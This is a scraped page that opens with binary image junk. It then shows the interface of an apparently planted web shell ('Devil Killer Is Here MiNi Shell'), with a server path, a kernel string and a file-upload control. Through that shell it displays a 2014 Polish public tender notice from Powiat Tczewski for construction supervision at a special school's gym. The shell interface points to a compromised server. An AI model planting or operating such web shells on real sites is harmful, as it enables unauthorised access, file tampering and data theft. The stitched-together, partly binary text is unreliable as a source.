JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140828/286280-N-2014.html

<p class="kh_header"><b>Tczew: PEŁNIENIE NADZORU INWESTORSKIEGO PRZY REALIZACJI ZADAŃ INWESTYCYJNYCH PN.: LIKWIDACJA BARIER W PORUSZANIU SIĘ OSÓB NIEPEŁNOSPRAWNYCH W OBRĘBIE 
SALI GIMNASTYCZNEJ ORAZ TERMOMODERNIZACJA OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ</b><br>
<b>Numer ogłoszenia: 286280 - 2014; data zamieszczenia: 28.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tczewski , ul. Piaskowa 2, 83-110 Tczew, woj. pomorskie, tel. 58 7734 800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE NADZORU INWESTORSKIEGO PRZY REALIZACJI ZADAŃ INWESTYCYJNYCH PN.: LIKWIDACJA BARIER W PORUSZANIU SIĘ OSÓB NIEPEŁNOSPRAWNYCH W OBRĘBIE 
SALI GIMNASTYCZNEJ ORAZ TERMOMODERNIZACJA OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem postępowania jest pełnienie nadzoru inwestorskiego nad robotami budowlanymi dotyczącymi budynku Specjalnego Ośrodka Szkolno-Wychowawczego w Tczewie, w związku z realizacją zadań inwestycyjnych pn.: Likwidacja barier w poruszaniu się osób niepełnosprawnych w obrębie sali gimnastycznej oraz Termomodernizacja obiektów użyteczności publicznej. 2.2 Adres obiektu prowadzenia robót budowlanych objętych - w ramach niniejszego zamówienia -  nadzorem inwestorskim: Specjalny Ośrodek Szkolno-Wychowawczy w Tczewie przy ulicy Grunwaldzkiej 1         (83-110 Tczew). 2.3 Szczegółowy zakres robót budowlanych w zakresie branż: konstrukcyjno-budowlanej, sanitarnej i elektrycznej które zostaną objęte nadzorem inwestorskim, określa dokumentacja projektowa stanowiąca Załącznik Nr 3 do SIWZ - Dokumentacja dotycząca przedmiotu zamówienia, składająca się z następujących pozycji: 2.3.1 Dokumentacja projektowa pn. Rozbudowa i przebudowa budynku oświaty autorstwa APA PROJEKT Pracowania Architektoniczna (siedziba: ul. Sportowa 2-2, 83-110 Tczew), obejmująca następujące pozycje: 1) Projekt architektoniczno-budowlany wraz z projektem zagospodarowania terenu, 2) Projekt budowlany konstrukcyjny, 3) Opinia geotechniczna i dokumentacja z badań podłoża, 4) Projekt budowlany instalacji elektrycznych, 5) Projekt budowlany instalacji sanitarnych, 6) Projekt architektoniczno-budowlany wraz z projektem zagospodarowania terenu faza wykonawcza, 7) Projekt wykonawczy konstrukcyjny, 8) Projekt wykonawczy instalacji elektrycznych, 9) Projekt budowlany instalacji sanitarnych faza wykonawcza, 10) Projekt budowlany instalacji grzewczo-wentylacyjnej faza wykonawcza, 11) Specyfikacja techniczna wykonania i odbioru robót budowlanych, 12) Przedmiar robót. 2.3.2 Dokumentacja projektowa autorstwa MB-MAXIPROJEKT Beata Starzyńska, (siedziba: ul. Gnieźnieńska 14, 75-736 Koszalin), obejmująca następujące pozycje w zakresie odnoszącym się do sali gimnastycznej i łącznika: 1) 4 rysunki określające zakres robót objętych niniejszym zamówieniem, 2) Projekt budowlany ocieplenia budynku o wysokości poniżej 12 wraz z wymianą stolarki okiennej i drzwiowej, 3) Projekt wykonawczy ocieplenia budynku o wysokości poniżej 12 wraz z wymianą stolarki okiennej i drzwiowej, 4) Projekt budowlany ocieplenia budynku o wysokości poniżej 12 wraz z wymianą stolarki okiennej i drzwiowej - Specyfikacja techniczna wykonania i odbioru robót budowlanych, 5) Przedmiar robót branża architektoniczna, 6) Projekt budowlany remontu instalacji centralnego ogrzewania, 7) Projekt wykonawczy remontu instalacji centralnego ogrzewania, 8) Projekt budowlany remontu instalacji centralnego ogrzewania - Specyfikacja techniczna wykonania i odbioru robót budowlanych, 9) Przedmiar robót branża sanitarna. UWAGA: Ww. dokumentacja projektowa obejmuje swoim zakresem wykonanie robót budowlanych dotyczących termomodernizacji Specjalnego Ośrodka Szkolno-Wychowawczego w Tczewie. Niniejszy przetarg dotyczy pełnienia nadzoru inwestorskiego nad robotami budowlanymi wyłącznie w zakresie wyszczególnionym na rysunkach, o których mowa w pkt 2.3.2 ppkt 1) SIWZ, a mianowicie odnoszącym się do sali gimnastycznej i łącznika. 2.4 Przedmiot zamówienia obejmuje pełnienie nadzoru inwestorskiego nad wykonaniem następujących robót budowlanych w poszczególnych zakresach: 2.4.1 Zakres 1: 1) dostawa, zakup i montaż windy przyściennej wraz z wybudowaniem szybu windowego i innymi pracami towarzyszącymi, 2) dostawa, zakup i montaż poręczy i uchwytów w ciągach komunikacyjnych oraz uchwytów ułatwiających korzystanie z urządzeń higieniczno-sanitarnych, wraz z pracami towarzyszącymi, 3) przystosowanie drzwi - zakup i montaż drzwi wewnętrznych o szerokości                w świetle co najmniej 90 cm, wraz z pracami towarzyszącymi, 4) przystosowanie podłoża pod wykładzinę antypoślizgową oraz zakup                         i ułożenie wykładziny antypoślizgowej w ciągach komunikacyjnych, wraz                z pracami towarzyszącymi, 5) dostosowanie pomieszczeń higieniczno-sanitarnych dla potrzeb osób niepełnosprawnych, a także adaptacja pomieszczeń na pomieszczenia higieniczno-sanitarne, wraz z pracami towarzyszącymi (dotyczy całego zespołu higieniczno-sanitarnego bez szatni). 2.4.2 Zakres 2: 1) kanały wentylacji grawitacyjnej wywiewnej typu Z w ścianach zewnętrznych, 2) podniesienie poziomu posadzki w jednym pomieszczeniu, 3) szpachlowanie, malowanie, kafelkowanie ścian, 4) dostawa i montaż szafek ubraniowych, 5) wymiana osłon na grzejniki w sali gimnastycznej, 6) wymiana urządzeń sportowych (drabinki gimnastyczne, tablice do koszykówki, uchwyty wraz z siatką do siatkówki), 7) montaż wentylatorów kanałowych w istniejących przewodach wentylacji grawitacyjnej, 8) wentylacja mechaniczna, 9) wykonanie instalacji oświetleniowej sali gimnastycznej, 10) oświetlenie ewakuacyjne, 11) instalacja c.w.u. oraz wod.-kan., 12) instalacja grzewczo-wentylacyjna. UWAGA: Ściany z płyt wiórowych pomieszczenia pod schodami w sali gimnastycznej zostaną rozebrane, a następnie wykonane nowe ściany z płyt GK oraz zostaną zakupione i zamontowane nowe drzwi. 2.4.3 Zakres 3: 1) docieplenie ścian zewnętrznych i szybu windowego wraz z nałożeniem warstwy wierzchniej, 2) malowanie elewacji (ściany zewnętrzne i ściany szybu windowego), 3) montaż nowych rynien i rur spustowych, opierzenie, prace towarzyszące, 4) montaż stolarki okiennej, 5) wymiana instalacji c.o. i prace towarzyszące, 6) wymiana grzejników. UWAGA: Wykonawca robót budowlanych nie odnowi krat zabezpieczających okna. Kraty w oknach zostaną jedynie zdemontowane i przekazane dyrektorowi SOSW Tczew. 
2.5	Podstawowe parametry-dane robót budowlanych w zakresie sali gimnastycznej: - powierzchnia zabudowy przed rozbudową: 281,50 m2, - powierzchnia użytkowa przed rozbudową: 327,41 m2, - kubatura przed rozbudową: 1799 m3. 2.6 Dla prawidłowego przygotowania oferty i realizacji zamówienia zaleca się dokonanie wizji lokalnej w miejscu planowanych robót budowlanych, nad którymi pełniony będzie nadzór inwestorski. 2.7 Zamawiający informuje, że udostępnione wraz z dokumentacją projektową przedmiary, z uwagi na wynagrodzenie ryczałtowe, pełnią funkcję wyłącznie pomocniczą i orientacyjną, a ich celem jest ułatwienie sporządzenia oferty przetargowej - zarówno dla Wykonawcy robót budowlanych (trwa procedura przetargowa związana z wyłonieniem wykonawcy na roboty budowlane), jak również dla Wykonawcy, który w ramach niniejszego zamówienia będzie pełnić funkcję inspektora nadzoru. Przedmiary stanowią część składową opisu przedmiotu zamówienia i nie mogą być dla Wykonawcy Nadzoru Inwestorskiego jedyną podstawą do obliczenia ceny oferty.  2.8 Wykonawca robót budowlanych został uprzedzony o obowiązku przedłożenia - przed podpisaniem umowy - kosztorysu ofertowego, obejmującego pełen zakres robót niezbędnych do wykonania w celu realizacji zadania.  Zadaniem Wykonawcy Nadzoru Inwestorskiego będzie sprawdzenie tego kosztorysu ofertowego przed podpisaniem umowy z Wykonawcą robót budowlanych oraz późniejsze posługiwanie się tym kosztorysem w przypadkach określonych w umowie z Wykonawcą robót budowlanych (w tym weryfikacja wprowadzania do niego zmian, np. w wyniku przyjęcia robót zamiennych lub dodatkowych). 
2.9	Wykonawca Nadzoru Inwestorskiego musi mieć świadomość, że przysługujące mu wynagrodzenie za wykonanie pełnego nadzoru nad robotami budowlanymi w zakresie wszystkich wymienionych branż będzie wynagrodzeniem ryczałtowym.
2.10	W przypadku zatrudnienia podwykonawców, Wykonawca będzie ponosić pełną odpowiedzialność wobec Zamawiającego i osób trzecich za działania i zaniechania podwykonawców, jak również za jakość wykonanych przez nich usług.2.12	Zamawiający nie dopuszcza możliwości składania ofert częściowych bądź wariantowych.
2.13	Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających w trybie art. 67 ust. 1 pkt 6 ustawy Pzp, do wysokości 50% wartości zamówienia podstawowego w branżach: konstrukcyjno-budowlanej, sanitarnej, elektrycznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1	Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę: 200,00 PLN (słownie: dwieście złotych 100/00).
8.2	Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w punkcie 11.1 SIWZ.
8.3	Wadium może być wnoszone w następujących formach: 
8.3.1 pieniądzu, 
8.3.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
8.3.3 gwarancjach bankowych, 
8.3.4 gwarancjach ubezpieczeniowych,
8.3.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
8.4  Jeżeli wadium zostanie wniesione w pieniądzu to należy je wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Tczewie 15 8345 0006 0000 0954 2000 0064. 
Wykonawca powinien dołączyć do oferty kserokopię wniesienia wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - przetarg nr ZP.272.17.2014. W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego, który należy złożyć łącznie z ofertą. Dokumenty potwierdzające wniesienie wadium, o których mowa w punkcie 8.3 SIWZ muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
8.5	W przypadku wnoszenia wadium w formie innej niż w pieniądzu, w treści tego dokumentu powinna znaleźć się treść art. 46 ust. 4a i 5 Ustawy określająca okoliczności zatrzymania wadium przez Zamawiającego (brak tej treści w dokumencie będzie skutkowało odrzuceniem oferty). Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie.
8.6	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany w punkcie 8.4 SIWZ.
8.7	Okoliczności i zasady zwrotu wadium, jego przepadku określa Ustawa.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że Wykonał, a przypadku świadczeń okresowych lub ciągłych wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a)	co najmniej 1 (jedną) usługę nadzoru inwestorskiego nad robotami budowlanymi, polegającymi na budowie szybu windowego wraz z montażem dźwigu osobowego elektrycznego
oraz 
b)	co najmniej 1 (jedną) usługę nadzoru inwestorskiego nad robotami budowlanymi, polegającymi na dociepleniu ścian zewnętrznych wraz z wykonaniem struktury (elewacji)
oraz
c)	co najmniej 1 (jedną) usługę nadzoru inwestorskiego nad robotami budowlanymi, polegającymi na kompleksowym wykonaniu wraz z zasilaniem i montażem aparatów grzewczo-wentylacyjnych wyposażonych w komory mieszania i czerpnie powietrza, wentylatorów dachowych, a także instalacji ciepła technologicznego do tych aparatów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, a mianowicie:
4.3.2.1	1 (jedną) osobą na stanowisko Koordynatora inspektorów nadzoru inwestorskiego w specjalności/branży konstrukcyjno-budowlanej, posiadającą:
a)	wymagane uprawnienia, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej nadzór inwestorski w specjalności/branży konstrukcyjno-budowlanej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
b)	co najmniej 2 lata doświadczenia zawodowego na stanowisku inspektora nadzoru przy realizacji robót budowlanych w branży konstrukcyjno-budowlanej;
4.3.2.2	1 (jedną) osobą na stanowisko inspektora nadzoru w specjalności/ branży sanitarnej, posiadającą:
a)	wymagane uprawnienia, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej nadzór inwestorski w specjalności/branży sanitarnej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
b)	co najmniej 1 rok doświadczenia zawodowego na stanowisku inspektora nadzoru przy realizacji robót budowlanych w branży sanitarnej;
4.3.2.3	1 (jedną) osobą na stanowisko inspektora nadzoru w specjalności/ branży elektrycznej, posiadającą:
a)	wymagane uprawnienia, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej nadzór inwestorski w specjalności/branży elektrycznej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
b)	co najmniej 1 rok doświadczenia zawodowego na stanowisku inspektora nadzoru przy realizacji robót budowlanych w branży elektrycznej.
UWAGI:
1)	Przez wymagane doświadczenie zawodowe należy rozumieć lata czynnie przepracowane na danym stanowisku obejmujące nadzór inwestorski nad robotami budowlanymi w danej branży. 
Niniejsze oznacza, iż osoba na stanowisko inspektora nadzoru w specjalności/branży konstrukcyjno-budowlanej musi posiadać doświadczenie zawodowe obejmujące nadzór inwestorski nad robotami budowlanymi w branży konstrukcyjno-budowlanej w ramach zamówienia/zamówień w łącznym okresie co najmniej 2 lat, natomiast osoby na stanowisko inspektora nadzoru w specjalności/branży odpowiednio: sanitarnej i elektrycznej muszą posiadać doświadczenie zawodowe obejmujące nadzór inwestorski nad robotami budowlanymi w odpowiedniej branży: sanitarnej bądź elektrycznej w ramach zamówienia/zamówień, w łącznym okresie dla każdego inspektora nadzoru co najmniej 1 roku.
2)	Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające mu kwalifikacje zawodowe/dokumenty uprawniające do wykonywania samodzielnych funkcji technicznych  w budownictwie/wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym,  z zastrzeżeniem art. 12a i innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane           (Dz. U. z 2013 r., poz. 1409 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).
3)	Zamawiający wymaga, aby osoby które będą uczestniczyć w wykonywaniu zamówienia były dopuszczone do pracy na wysokościach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga od Wykonawcy wskazania w wykazie (sporządzonym według wzoru stanowiącego Załącznik Nr 1D do SIWZ) wykonanie co najmniej 1 (jednej) usługi nadzoru inwestorskiego nad robotami budowlanymi polegającymi na budowie szybu windowego wraz z montażem dźwigu osobowego elektrycznego oraz co najmniej 1 (jednej) usługi nadzoru inwestorskiego nad robotami budowlanymi polegającymi na dociepleniu ścian zewnętrznych wraz z wykonaniem struktury (elewacji) oraz co najmniej 1 (jednej) usługi nadzoru inwestorskiego nad robotami budowlanymi polegającymi na kompleksowym wykonaniu wraz z zasilaniem i montażem aparatów grzewczo-wentylacyjnych, wyposażonych w komory mieszania i czerpnie powietrza, wentylatorów dachowych, a także instalacji ciepła technologicznego do tych aparatów.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
